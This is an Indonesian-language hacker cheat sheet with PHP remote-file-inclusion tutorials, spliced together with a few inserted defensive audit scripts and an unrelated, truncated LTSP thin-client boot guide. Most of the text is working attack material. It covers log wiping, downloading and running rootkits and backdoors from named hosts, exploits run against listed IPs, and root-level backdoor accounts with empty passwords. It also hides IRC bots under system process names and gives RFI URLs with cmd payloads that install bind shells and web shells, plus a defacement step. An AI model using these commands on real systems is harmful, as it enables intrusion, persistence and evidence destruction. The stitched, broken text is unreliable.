cd /var/tmp/” ” <== del semua tools test shell with port 7788 and password 35b4tud1n91n ================================================ [Langkah Hapus Log I] ================================================ export HISTFILE=/dev/null ; export HISTSIZE=0; export HISTFILESIZE=0 ================================================ [Langkah Hapus Log I] ================================================ rm -rf /var/log/wtmp ; rm -rf /var/log/lastlog ; rm -rf /var/log/secure ; rm -rf /var/log/xferlog ; rm -rf /var/log/messages ; rm -rf /var/run/utmp ; touch /var/run/utmp ; touch /var/log/messages ; touch /var/log/wtmp ; touch /var/log/messages ; touch /var/log/xferlog ; touch /var/log/secure ; touch /var/log/lastlog ; rm -rf /var/log/maillog ; touch /var/log/maillog ; rm -rf /root/.bash_history ; touch /root/.bash_history ; history -r ================================================ wget http://brutalside.host.sk/tools/term chmod +x term ./term lonthe123 ================================================ wget http://brutalside.host.sk/tools/ftp.tgz gunzip ftp.tgz gzip ftp.tar tar -zxvf ftp.tar.gz cd ftp ./scan 163 22 10 ./scan 163 22 10 163 ================================================ scan port dgn pscan.c ==> www.packetstormsecurity.nl
bila port:23 vurnerable bisa running exploit
wget http://phaty.org/7350854_c.txt
mv 7350854_c.txt 7350854.c
gcc -o 7350854 7350854.c
./7350854 IP
./7350854 216.89.24.213
================================================ http://brutalside.host.sk/tools/kik
chmod +x kik
./kik “-bash” ./psybnc
================================================ ================================================ find / -name wtmp -print
find / -name utmp -print
find / -name lastlog -print
whereis wtmp
whereis utmp
whereis lastlog
===================
/usr/sbin/useradd -d /home/apache -s /bin/ksh apache
passwd apache
Terus konek ke shell dengan user biasa,masuk ke cd /tmp dan
wget www.norifumiya.org/r.c
gcc -o sh r.c
rm -rf r.v
rm -rf r.c
chown 0:0 /tmp/sh
chmod 777 sh
Sampai disini kita selesai dengan permainan di server target root
Sekarang kita kembali ke user dan ketik :
./sh
nah, apa yg terjadi setelah kita jalankan command ./sh…?
yg terjadi adalah uid dan gid kita adalah 0
================================================ wget www.psychoid.lam3rz.de/psyBNC2.2.1-linux-i86-static.tar.gz
tar -zxvf psyBNC2.2.1-linux-i86-static.tar.gz
cd psybnc
echo “PSYBNC.SYSTEM.PORT1=60000″ >> psybnc.conf
echo “PSYBNC.SYSTEM.HOST1=*” >> psybnc.conf
echo “PSYBNC.HOSTALLOWS.ENTRY0=*;*” >> psybnc.conf
./psybnc psybnc.conf
================================================ wget www.psychoid.lam3rz.de/psyBNC2.2.1-linux-i86-static.tar.gz
mv psyBNC2.2.1-linux-i86-static.tar.gz .sh ; tar -zxvf .sh ; rm .sh ; mv psybnc .log ; cd .log
mv psybnc “syslogd ”
echo “PSYBNC.SYSTEM.PORT1=60000″ >> psybnc.conf
echo “PSYBNC.SYSTEM.HOST1=*” >> psybnc.conf
echo “PSYBNC.HOSTALLOWS.ENTRY0=*;*” >> psybnc.conf
mv psybnc.conf ” ” ; pwd
PATH=$PATH:/var/tmp/” “/.log/
“syslogd ” ” ”
mv psybnc.pid .log ; mv ./psybncchk .sh ; mv ./log/psybnc.log .mud
================================================ +Command Mapache2x
- ./mapache RangeIP (mis: ./mapache 200 443 10 10) << Scan - ./apache IPTarget (Mis: ./apache 202.11159.67.176) ================================== +Command MassApache - ./massossl RangeIP (mis: ./massossl 22200 443 10 10) << Scan - ./osslx -a 0x0b -v IPTarget (Mis: ./ooosslx -a 0x0b -v 202.159.67.176) ================================================ +FTP Command 4 RooT - ./scan No Depan IP Target (Mis: ./scannn 210 21 10) =addUser= uid=0(root) gid=0(root) groups=50(ftp) Linux root.ivines.co.kr 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknow adduser? ketik /usr/sbin/adduser kuntua -g wheel -s /bin/bash -d /home/kuntua enter, buat password ketik passwd kuntua enter , abis itu ketik tondano tekan enter abis itu ketik lagi tondano , nb: ketik tondano dua kali itu kegunaan nya buat password kita Changing password for user ganjen passwd: all authentication tokens updated successfully berarti kita udah dapet user di shell tersebut, jadi tinggal login aja, jangan lupa catet ip nyah.. kalo mau dapet acces root ketik : /usr/sbin/useradd bash -u 0 -d / abis itu ketik lagi passwd -d bash apus jejak cd / rm -f /.bash_history /root/.bash_history /var/log/messages ln -s /dev/null /root/.bash_history touch /var/log/messages chmod 600 /var/log/messages rm -rf /var/log/lastlog cat > /var/log/lastlog
udah di ketik semua ? udahh… tekan ctrl d .
=================================
+Backdoor
NEWCOMER FREZZ BackDooR
- wget manadocarding.info/charles; chmod 755 charles; ./charles
= wget http://www.geocities.com/lifron/root; chmod 755 root; ./root
- wget http://www.geocities.com/cak_mus/shv4.tar.gz; tar -zxvf shv4.tar.gz; cd shv4; ./setup kuntua 7000
= wget http://www.geocities.com/lifron/shv4.tar.gz; tar -zxvf shv4.tar.gz; cd shv4; ./setup kuntua75 7000
***** ADD USER SHELL *****
/usr/sbin/useradd yrfon -g wheel -s /bin/bash -d /etc/.yrfon
passwd -d yrfon
—————–
Patch Your Root
—————–
wget http://www.geocities.com/lifron/patch.tar.gz
tar -zxvf patch.tar.gz
cd patch
./sexy
BERSIH JEJAK:manual
echo >/var/spool/mail/root
echo >/var/run/utmp
echo >/var/log/wtmp
echo >/var/log/lastlog
echo >/var/log/messages
echo >/var/log/secure
echo >/var/log/maillog
echo >/var/log/xferlog
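The cleanup commands above leave a footprint of their own: log files that exist but are empty or hold a single newline, and a root shell history that points at /dev/null. The following check for that footprint is an added example, not part of the original text; the function names and the sample directory tree are constructed for illustration.

```shell
#!/bin/sh
# Log files named in the cleanup steps on this page, relative to the filesystem root.
LOG_FILES="var/log/wtmp var/log/lastlog var/log/messages var/log/secure var/log/maillog var/log/xferlog var/run/utmp"

# check_log_tamper [ROOT]
# Prints one finding per line for an image or live filesystem mounted at ROOT.
check_log_tamper() {
    root=${1:-/}
    for rel in $LOG_FILES; do
        f="${root%/}/$rel"
        # Absent or unreadable files are skipped: many systems never create some of them.
        [ -f "$f" ] && [ -r "$f" ] || continue
        size=$(wc -c < "$f" | tr -d ' ')
        # 0 bytes = removed and recreated with touch; 1 byte = overwritten with "echo >".
        if [ "$size" -le 1 ]; then echo "TRUNCATED $rel size=$size"; fi
    done
    h="${root%/}/root/.bash_history"
    if [ -L "$h" ] && [ "$(readlink "$h")" = "/dev/null" ]; then
        echo "HISTORY_NULLED root/.bash_history"
    fi
}

# Builds a small constructed tree (not from a real host) and prints its path.
build_sample_root() {
    t=$(mktemp -d)
    mkdir -p "$t/var/log" "$t/var/run" "$t/root"
    : > "$t/var/log/wtmp"                       # 0 bytes
    echo > "$t/var/log/messages"                # 1 byte
    printf 'Jan 15 10:00:00 host sshd[1]: constructed line\n' > "$t/var/log/secure"
    ln -s /dev/null "$t/root/.bash_history"
    echo "$t"
}

sample=$(build_sample_root)
check_log_tamper "$sample"
rm -rf "$sample"
```

A freshly rotated log is also empty, so a hit is a prompt to compare against rotated copies and remote syslog, not proof on its own.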
==================================
LOCAL ROOT http://www.geocities.com/lifron/local.tar.gz
2.wget http://kelik-pelipur-lara.org/tools/local.tar.gz
cd local
chmod 755 *
./local.sh
./lconfex -p
./lconfex -f
sh ./handy.sh 0xbffffb24 0xbffff661
——————-
Add user dlm Root:
——————-
1.
/usr/sbin/useradd kuntua -g wheel -s /bin/bash -d /etc/.kuntua
passwd -d kuntua
/usr/sbin/useradd moes -g wheel -s /bin/bash -d /etc/.moes
passwd -d moes
/usr/sbin/useradd cakmoes -g wheel -s /bin/bash -d /etc/.cakmoes
passwd -d cakmoes
2.
/usr/sbin/adduser jabriks -g root -d /var/jabriks
passwd -d jabriks
/usr/sbin/adduser mus -g root -d /var/mus
passwd -d mus
/usr/sbin/useradd tondano -g wheel -s /bin/bash -d /home/.tondano
passwd tondano75
—————————-
**add user accses root
—————————-
/usr/sbin/useradd bash -g root -u 0 -d /
passwd -d tondano
/usr/sbin/useradd jabrik -g root -u 0 -d /
passwd -d jabrik
/usr/sbin/useradd cakmoes -g root -u 0 -d /
passwd -d cakmoes
———–
Del User
———–
/usr/sbin/userdel -r [namauser]
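The accounts created above share a few traits that an audit of /etc/passwd and /etc/shadow can pick out: a second UID 0 entry, a login account whose primary group is root or wheel, a home directory hidden behind a leading dot, and an empty password field (the result of passwd -d). This audit is an added example, not part of the original text; the function names and sample entries are constructed, and wheel being GID 10 is an assumption that can be overridden with PRIV_GIDS.

```shell
#!/bin/sh
# Constructed sample data (not from a real host).
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:2:2:daemon:/sbin:/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
svc1:x:0:0::/:/bin/sh
svc2:x:1001:10::/etc/.svc2:/bin/bash
svc3:x:1002:0::/var/svc3:/bin/bash'

SAMPLE_SHADOW='root:$6$constructed$hash:19000:0:99999:7:::
daemon:*:19000:0:99999:7:::
alice:$6$constructed$hash:19000:0:99999:7:::
svc1::19000:0:99999:7:::
svc2::19000:0:99999:7:::
svc3:!!:19000:0:99999:7:::'

# audit_passwd: reads passwd(5) lines on stdin, prints one finding per line.
audit_passwd() {
    awk -F: -v priv="${PRIV_GIDS:-0 10}" '
        BEGIN { n = split(priv, g, " "); for (i = 1; i <= n; i++) isPriv[g[i]] = 1 }
        /^#/ || NF < 7 { next }
        # Any UID 0 entry other than root is a second superuser.
        $3 == 0 && $1 != "root" { print "UID0 " $1 }
        # Non-root account with a login shell whose primary group is privileged.
        $3 != 0 && ($4 in isPriv) && ($7 == "" || $7 ~ /sh$/) { print "PRIV_GROUP " $1 " gid=" $4 }
        # Home directory with a dot-prefixed path component.
        $6 ~ /\/\./ { print "HIDDEN_HOME " $1 " " $6 }
    '
}

# audit_shadow: reads shadow(5) lines on stdin, flags empty password fields.
audit_shadow() {
    awk -F: 'NF >= 2 && $2 == "" { print "EMPTY_PASSWORD " $1 }'
}

printf '%s\n' "$SAMPLE_PASSWD" | audit_passwd
printf '%s\n' "$SAMPLE_SHADOW" | audit_shadow
```

On a live host, run it as `audit_passwd < /etc/passwd` and, as root, `audit_shadow < /etc/shadow`.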
PENTING
kalo so dapat ROOT
ketik id
uname -a
abis itu
ketik cd /tmp
—————–
——————————————–
ngeROOT ssh LINUX port 22:
wget http://packetstormsecurity.org/groups/teso/grabbb-0.1.0.tar.gz
tar -zxvf grabbb-0.1.0.tar.gz.tar.gz
gcc -o grabbb grabbb.c
cd grabbb
./grabbb -a IP -b IP port co:./grabbb -a 202.1.1.1 -b 202.1.1.1 22
66.201.243.210
——————————————–
wget www.suckmyass.org/ssh-scan8.tar.gz
tar
cd ssh-scan8
./r00t 203.20 -d 4 <— scan massal SSH ./r00t 203.20 -d 2 <— scan massal FTP ./r00t 203.20 -d 3 <— scan massal FTP ./r00t 134.7. -d 4 ——————————————– ngeROOT utk OS SCO : wget www.renjana.com/sco ./sco IP ——————————————– pasang BackDoor: 1. id uname -a cd /tmp wget http://packetstormsecurity.org/UNIX/penetration/rootkits/tk.tgz ls -al tar -zxvf tk.tgz cd tk ./t0rn kuntua 7000 ——————————————– LINKS: http://www.eviltime.com/download/exploit www.cahcepu.net www.vibrasi.net www.paktani.tk www.sisilainrevolt.org www.sitiung.com www.utay-doyan.cc www.atstake.com/research/redirect.html?users/10pht/nc110.tgz ======= Usage: ./sambal [-bBcCdfprsStv] [host] -b bruteforce (0 = Linux, 111 = FreeBSD/NetBSD, 2 = OpenBSD 3.1 and prior, 3 = OpenBSD 3.2) -B bruteforce steps (defaulllt = 300) -c connectback ip address -C max childs for scan/bruttteforce mode (default = 40) -d bruteforce/scanmode delaaay in micro seconds (default = 100000) -f force -p port to attack (default = 139) -r return address -s scan mode (random) -S scan mode -t presets (0 for a list) -v verbose mode CONTOH: [esdee@embrace esdee]$ ./sambal -d 0 -C 60 -S 192.168.0 samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be) ————————————————————– + Scan mode. + [192.168.0.3] Samba + [192.168.0.10] Windows + [192.168.0.35] Windows + [192.168.0.36] Windows + [192.168.0.37] Windows … + [192.168.0.133] Samba ./sambal -b 0 -v =========== Usage: ./mayday-linux -t [-pa] -t target The host to attack. -a password Default password is “chaaangeme”. -p port Default port is 8001. 
================ /usr/sbin/adduser httpd passwd httpd ============ PACTH SAMBA = root@redeye samba]# /etc/init.d/smb stop = Shutting down SMB services: [ OK ] = Shutting down NMB services: [ OK ] = [root@redeye root]# cd /etc/samba = [root@redeye samba]# wget http://master.samba.org/samba/ftp/patches/patch-2.2.8-2.2.8a.diffs.gz = [root@redeye samba]# gunzip patch-2.2.8-2.2.8a.diffs.gz = [root@redeye samba]# patch -p1 < patch-2.2.8-2.2.8a.diffs = [root@redeye samba]# /etc/init.d/smb start ======================= ======= VHOST = edit di httpd.conf = tinggal tambah no = kong di named.conf = 1. wget http://apache.towardex.com/httpd/apache_1.3.27.tar.gz = 2. tar zxvf apache_1.3.27.tar.gz = 3. cd apache_1.3.27 = 4. ./configure = 5. make = 6. make install = 7. /usr/local/apache/bin/apachectl start = cd /usr/local/apache/conf/httpd.conf = contoh = echo “” > httpd.conf
= echo “ServerName www.Cmaster4.net” > httpd.conf
= echo “DocumentRoot /home/iptek/public_html” > httpd.conf
= echo “ScriptAlias /cgi-bin /www/Cmaster4.net/cgi-bin” > httpd.conf
= echo “” >> httpd.conf
= ——————————
= ——————————
= ——————————
= find |grep name.conf
= echo “zone “i-am.Cmaster4.net” IN {” > named.conf
= echo “type master; > named.conf
= echo “file “/var/named/named.local”;” > named.conf
= echo “allow-update { none; };” > named.conf
= echo “};” >> named.conf
= nah setelah itu kamu restart named dan httpd nya
= /etc/init.d/named stop
= /etc/init.d/named start
= /etc/init.d/httpd stop
= /etc/init.d/httpd start
= atau
= /etc/rc.d/init.d/named stop
= /etc/rc.d/init.d/named start
= /etc/rc.d/init.d/httpd stop
= /etc/rc.d/init.d/httpd start
= atau kalau bukan di /etc/init.d/ coba ketik find |grep named dan berikutnya find |grep httpd
=================================================================
wget http://www.geocities.com/lifron/Pre-psyBNC.tgz; tar -zxvf Pre-psyBNC.tgz; cd psybnc; make; wget http://www.geocities.com/lifron/psybnc.conf.6669.txt; mv psybnc.conf.6669.txt .sh; wget http://www.geocities.com/lifron/kik; chmod +x kik; ./kik “/usr/sbin/httpd -DHAVE_PROXY -DHAVE” ./psybnc .sh; cd ..; rm -rf Pre-psyBNC.tgz
====================
EGGDROP
====================
= wget www.geocities.com/lifron/eggdrop.tar.gz; tar -zxvf eggdrop.tar.gz; cd eggdrop; wget www.geocities.com/lifron/bot.conf; cd scripts; wget www.geocities.com/lifron/netgate.tcl; cd ..
= ./eggdrop -mnt bot.conf
./eggdrop -m bot.conf
==============
My_eGallery from K-159
==============
1.pasangin bindtty
2. kalo ggk jalan bindtty nya pasangin shell.php
3.kalo ggk jalan juga coba cgi-telnet
contohnya
http://livron.port5.com/mail.php <———ini source shell misalnya: http://www.moonshade.com/modules/My_eGallery/public/displayCategory.php?basepath=http://www.geocities.com/lifron/suntik.txt?&cmd=wget%20http://livron.port5.com/mail.php kalo gak bisa kita cari folder yg bisa buat id wwrun utk wget kalo bisa… buka: http://www.target.org/modules/My_eGallery/public/mail.php ======== pasang bindtty wget www.geocities.com/lifron/bindtty -O /tmp/httpd ini biar hasil wgetnya di taro di folder /tmp dg nama file httpd baru bikin file exekusi chmod 755 /tmp/httpd ============ cgi-telnet mencari folder cgi-binnya >> disitulah kita Taro cgi-telnetnya
biasanya folder cgi-bin ada di folder …/www
tp kebanyakan webserver
tiap user di beri folder cgi-bin masing2
contoh:
/home/users/russisk/html/modules/My_eGallery/public <——td kan kita ada di folder ini http://www.russisk.org/modules/My_eGallery/public/displayCategory.php?basepath=http://www.geocities.com/lifron/suntik.txt?&cmd=ls%20-al%20/home/users/russisk kliatan cgi-bin-nya cd ke folder cgi-bin baru wget ke situ Contoh: wget http://livron.port5.com/kuntua.pl -O /home/users/russisk/cgi-bin/cgi.pl kalo bisa lanjut ke chmod 755 /home/users/russisk/cgi-bin/cgi.pl <——-agar file cgi.pl nya jd file eksekusi kalo bisa tinggal buka: www.target.org/cgi-bin/cgi.pl port 7788 ============ end wget www.geocities.com/lifron/psy.tar.gz; tar -zvxf psy.tar.gz cd .psy ./config KuNTuA 6669 ./fuck ./run =========== Tittle : SUPER KIDDIES HACKING: “PHP SUPER BUGS” Author : K-159 Greetz : Lieur-Euy, Red_Face, Itsme-, yudhax, pe_es, bithedz, KuNtuA, Baylaw, Minangcrew, Chanel : #bandunghacker, #indohackinglink, #hackercrew, #batamhacker, #aikmel Email : eufrato@linuxmail.org Reference : security-corporations.com, security-focus.com, bugs-traq, google.com ——————————————————————————————————– Prolog : i wrote this tutorial just for my dearest brother “Lieur-Euy” thx for all the best friendship, spirit, motivation, kindness, joke, and all the time that we spend together. just wait, till i finished my homework. ‘n we will rock the world again 1. allinurl filename bugs filename ini targetnya dapat kita cari dengan keyword “allinurl:*.php?filename=*”. keyword ‘*.php’ bisa di ganti dengan apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah “allinurl:index.php?filename=*”. Setelah mendapatkan target maka buat lah urlnya jadi seperti ini: ” http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts “ kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb. 2. 
allinurl content bugs content ini targetnya dapat kita cari dengan keyword “allinurl:*.php?content=”. keyword ‘*.php’ bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah “allinurl:index.php?content=”. Setelah mendapatkan target maka buat lah urlnya jadi seperti ini: ” http://www.target.com/target/index.php?content=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts “ kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb. 3. allinurl page bugs page ini targetnya dapat kita cari dengan keyword “allinurl:*.php?page=*”. ‘*.php’ bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah “allinurl:index.php?page=”. Setelah mendapatkan target maka buat lah urlnya jadi seperti ini: http://www.target.com/target/index.php?page=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb. 4. allinurl link bugs filename ini targetnya dapat kita cari dengan keyword “allinurl:*.php?link=*”. keyword ‘*.php’ bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah “allinurl:index.php?link=*”. Setelah mendapatkan target maka buat lah urlnya jadi seperti ini: http://www.target.com/target/index.php?link=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb. 5.allinurl file bugs file ini targetnya dapat kita cari dengan keyword “allinurl:*.php?file=*”. ‘*.php’ bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah “allinurl:index.php?file=*”. 
Setelah mendapatkan target maka buat lah urlnya jadi seperti ini: http://www.target.com/target/index.php?file=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb. Setelah mendapatkan target yang vulnerable ada beberapa hal yang bisa kita lakukan : I. install bindtty telnet 1.buat url seperti ini: ” http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=wget http://nofry.port5.com/bind1 -O /tmp/httpd “ url diatas untuk melakukan wget bindtty telnet ke server target dan hasil wget nya di taruh di folder /tmp dg nama file httpd. 2.lalu ubah file httpd yg berada di folder /tmp tadi jadi file eksekusi: ” http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=chmod 755 /tmp/httpd “ 3.eksekusi file httpd tadi : ” http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=/tmp/httpd “ 4. buka telnet ke IP target sesuai dg port bindttynya II. install Cgi-telnet 1.buat url seperti ini : ” http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=wget http://nofry.port5.com/pees.pl -O /var/www/cgi-bin/test.pl “ url diatas untuk melakukan wget cgi-telnet test.pl ke server target dan hasil wget disimpan di folder /var/www/cgi-bin dg nama file test.pl. sesuaikan dengan letak folder cgi-bin didalam server tersebut untuk menyimpan hasil wget cgi-telnetnya. 2. buat cgi-telnet test.pl jadi file eksekusi : ” http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=chmod 755 /var/www/cgi-bin/test.pl “ 3. akses cgitelnet kita dengan membuka url : ” http://www.target.com/cgi-bin/test.pl “ masukkan passwordnya “n0fr13″ III. install shell php 1. 
buat url seperti ini : “http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=wget http://emilroni.port5.com/mail.php -O log.php “ url diatas utk melakukan wget ke server target dan hasil wget berupa file log.php. bila keluar pesan “permission denied” cari lah folder lain yang bisa untuk wget shell.php kita. 2. akses shell php kita sesuai dengan foldernya : ” http://www.target.com/target/log.php “ IV. Deface http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=echo “K-159 and crew was touch your system” > test.html
thats all my friends. just try it !!!
Denpasar, 15 january 2004
K-159
Epilog :special thx to my beloved sister “May” for all the spirit, motivations, love, kindness, and all the fire that u give to me.”I love U my dear sister, in the name of Allah”.
bacaan lebih lanjut:
——————–
www.geocities.com/emilroni/hackurl.txt
www.geocities.com/emilroni/google.txt
=======================
=========================================================================================
Title :SUPER KIDDIES HACKING “Super Bugs PHP II”
Author :K-159
Greetz :KuNTuA, Lieur-Euy, pe_es.
Reference :google.com, membres.lycos.fr, security-corporations.com, security-challenge.com
==========================================================================================
Proof of Concept :
==================
A flaw in how URLs are handled by the fopen() function, which lets an attacker inject a script into the target server.
Target :
========
Temukan target nya di google dengan keyword:
1.allinurl:*.php?page=*
2.allinurl:*.php?content=*
3.allinurl:*.php?file=*
4.allinurl:*.php?filename=*
5.allinurl:*.php?link=*
6.allinurl:*.php?view=*
7.allinurl:*.php?sec=*
8.allinurl:*.php?document=*
9.allinurl:*.php?p=*
10.allinurl:*.php?x=*
Exploit:
==========================================================================================
1.http://www.target.com/target.php?page=http://www.geocities.com/inul_asoy/page.txt
2.http://www.target.com/target.php?content=http://www.geocities.com/inul_asoy/content.txt
3.http://www.target.com/target.php?file=http://www.geocities.com/inul_asoy/file.txt
4.http://www.target.com/target.php?filename=http://www.geocities.com/inul_asoy/filename.txt
5.http://www.target.com/target.php?link=http://www.geocities.com/inul_asoy/link.txt
6.http://www.target.com/target.php?view=http://www.geocities.com/inul_asoy/view.txt
7.http://www.target.com/target.php?sec=http://www.geocities.com/inul_asoy/sec.txt
8.http://www.target.com/target.php?documet=http://www.geocities.com/inul_asoy/_document_._txt
9.http://www.target.com/target.php?p=http://www.geocities.com/inul_asoy/p.txt
10.http://www.target.com/target.php?x=http://www.geocities.com/inul_asoy/x.txt
Details Exploit:
==========================================================================================
Upload a file : uploads a file to the target server
Explore with fopen() function : looks for targets containing fopen on the target server
Execute arbitrary PHP functions : creates a PHP script on the target server
Execute a system() command : runs Unix/Linux commands on the target server
Manager for SQL Server : changes the target server's SQL database settings
System overviewer (get the root !) : inspects the target server's system and performs a local root
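The requests described above all have one shape: a query parameter whose value is itself a remote URL. This filter, which flags that shape in a web server access log, is an added example and not part of the original text; the combined log format, the function name and the sample lines (documentation IP ranges and example hosts) are constructed assumptions.

```shell
#!/bin/sh
# Constructed access-log lines in Apache combined format (not real traffic).
SAMPLE_ACCESS_LOG='192.0.2.10 - - [15/Jan/2004:10:00:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 5120
198.51.100.7 - - [15/Jan/2004:10:00:05 +0000] "GET /index.php?page=http://files.example.net/x.txt?&cmd=id HTTP/1.1" 200 312
198.51.100.7 - - [15/Jan/2004:10:00:09 +0000] "GET /view.php?file=HTTP%3A%2F%2Ffiles.example.net%2Fx.txt HTTP/1.1" 404 210
192.0.2.33 - - [15/Jan/2004:10:01:00 +0000] "GET /download.php?file=/docs/manual.pdf HTTP/1.1" 200 88211'

# find_rfi_requests: reads access-log lines on stdin and prints
# "client parameter status" for every query parameter whose value starts
# with http://, https:// or ftp://, plain or percent-encoded.
find_rfi_requests() {
    awk '
    {
        url = $7                                  # request target
        q = index(url, "?")                       # first "?" starts the query string
        if (q == 0) next
        n = split(substr(url, q + 1), pair, "&")
        for (i = 1; i <= n; i++) {
            eq = index(pair[i], "=")
            if (eq == 0) continue
            name = substr(pair[i], 1, eq - 1)
            value = tolower(substr(pair[i], eq + 1))
            if (value ~ /^(https?|ftp)(:|%3a)(\/|%2f)(\/|%2f)/)
                print $1, name, $9                # $9 is the HTTP status
        }
    }'
}

printf '%s\n' "$SAMPLE_ACCESS_LOG" | find_rfi_requests
```

Legitimate redirect parameters also carry URLs, so review hits by script and status code. On the server itself, this class of bug is closed by setting allow_url_include (and allow_url_fopen where it is not needed) to Off in php.ini and by mapping the parameter to a fixed list of local files.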
[REPOST] – Thin Client LTSP – Hard Disk Booting Solution
LTSP
This is an old post, first published in 2006, and it is still relevant to the topic of thin clients.
Deploying LTSP is certainly appealing: the idea is to make old computers run at the speed of new ones. There is one rather annoying obstacle, however: not every old computer has a boot ROM or PXE, and frankly, although it is easy to download a ROM image from http://www.rom-o-matic.net, it is hard to get hold of an EEPROM writer to write that ROM image to a ROM chip.
To get around this we can boot from a floppy or a hard disk. For a floppy, download the floppy bootable ROM image (*.zdsk), insert a formatted floppy disk into the drive and type the command:
$ cat nama-image-rom.zdsk > /dev/fd0
or, if you use DOS/Windows, use the RAWRITE program to write the boot ROM image to the floppy disk.
But booting from a floppy has a problem of its own: it is suitable only for experiments, not for operational use, because floppy disks and floppy drives fail easily. The next option is therefore to boot from the hard disk. To boot from the hard disk, a few things have to be prepared:
• Internet connection
• LTSP server (of course)
• Thin client with a hard disk and CD drive
• Damn Small Linux (DSL) LiveCD
note:
The CD drive is needed only while setting up the client; once that is done, the CD drive can be removed from the thin client again.
Start by booting DSL from the CD drive; I usually use this to check at the same time that devices such as the NIC, hard disk and VGA card work properly. If everything is normal, open a terminal and prepare the hard disk by writing zeros over the start of the disk (the dd command below overwrites the first 5 MB of /dev/hda, including the MBR and partition table, so anything already on that disk is lost):
# sudo su
# dd if=/dev/zero of=/dev/hda bs=1M count=5
Using the “cfdisk” tool, repartition the hard disk. We only need a single 40 KB partition. After partitioning, format it with the command:
# mke2fs /dev/hda1
then mount the partition:
# mkdir -p /mnt/hda1
# mount /dev/hda1 /mnt/hda1
The next step is to download the LILO/GRUB/SYSLINUX loadable kernel format (.zlilo) image from http://www.rom-o-matic.net that matches your NIC. At this point there is often confusion about which boot ROM image matches the NIC. To find out which NIC you have, run:
# lspci
on my computer this command produces the following output:
…..
00:1f.6 Modem: Intel Corporation 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) AC’97 Modem Controller (rev 03)
01:01.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL-8139/8139C/8139C+ (rev 10)
01:02.0 Ethernet controller: Linksys, A Division of Cisco Systems [AirConn] INPROCOMM IPN 2220 Wireless LAN Adapter (rev 01)
…..
Note the line labelled Ethernet controller, which shows that my NIC type is RTL-8139. But how do we choose among the 14 RTL-8139 variants available? By finding the PCI ID of the NIC. To find it, run:
# lspci -n
this command produces the output below:
……
00:1f.6 Class 0703: 8086:24c6 (rev 03)
01:01.0 Class 0200: 10ec:8139 (rev 10)
01:02.0 Class 0200: 17fe:2220
…..
In the second line, note the hex number 10ec:8139; this is the PCI ID of the NIC that we need. So the boot ROM image to pick is: rtl8139:rtl8139 — [0x10ec:0x8139]. Do the same for your own NIC.
After downloading the LILO/GRUB/SYSLINUX loadable kernel format (.zlilo) image, create a lilo.conf file in /mnt/hda1 with the following contents:
lba32
boot = /dev/hda
map = /mnt/hda1/.map
install = /mnt/hda1/boot-menu.b
image = /mnt/hda1/rom-image-yang-anda-download.zlilo
label=LTSP
then run the following command to write the Etherboot code to the hard disk's MBR as a LILO image:
# lilo -v -C /mnt/hda1/lilo.conf -s /mnt/hda1/backup
After this step, restart to try booting from the hard disk.
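The NIC identification and lilo.conf steps above can be scripted. This is an added example, not part of the original post: it extracts the PCI IDs of Ethernet-class devices from `lspci -n` output in the notation the post quotes, and renders the lilo.conf shown above for a given image. The function names and the image file name eb-rtl8139.zlilo are hypothetical; the sample input is the post's own lspci -n output.

```shell
#!/bin/sh
# lspci -n output as shown in the post.
SAMPLE_LSPCI_N='00:1f.6 Class 0703: 8086:24c6 (rev 03)
01:01.0 Class 0200: 10ec:8139 (rev 10)
01:02.0 Class 0200: 17fe:2220'

# ethernet_pci_ids: reads `lspci -n` output on stdin and prints 0xVENDOR:0xDEVICE
# for every device of class 0200 (Ethernet controller). Accepts both the older
# "Class 0200:" layout shown in the post and the newer "0200:" layout.
ethernet_pci_ids() {
    awk '
    {
        if ($2 == "Class") { cls = $3; id = $4 } else { cls = $2; id = $3 }
        sub(/:$/, "", cls)
        if (cls == "0200" && id ~ /^[0-9a-f][0-9a-f][0-9a-f][0-9a-f]:[0-9a-f][0-9a-f][0-9a-f][0-9a-f]$/) {
            split(id, p, ":")
            print "0x" p[1] ":0x" p[2]
        }
    }'
}

# render_lilo_conf IMAGE [DISK] [MOUNTPOINT]
# Prints the lilo.conf from the post for the given .zlilo image; writes nothing to disk.
render_lilo_conf() {
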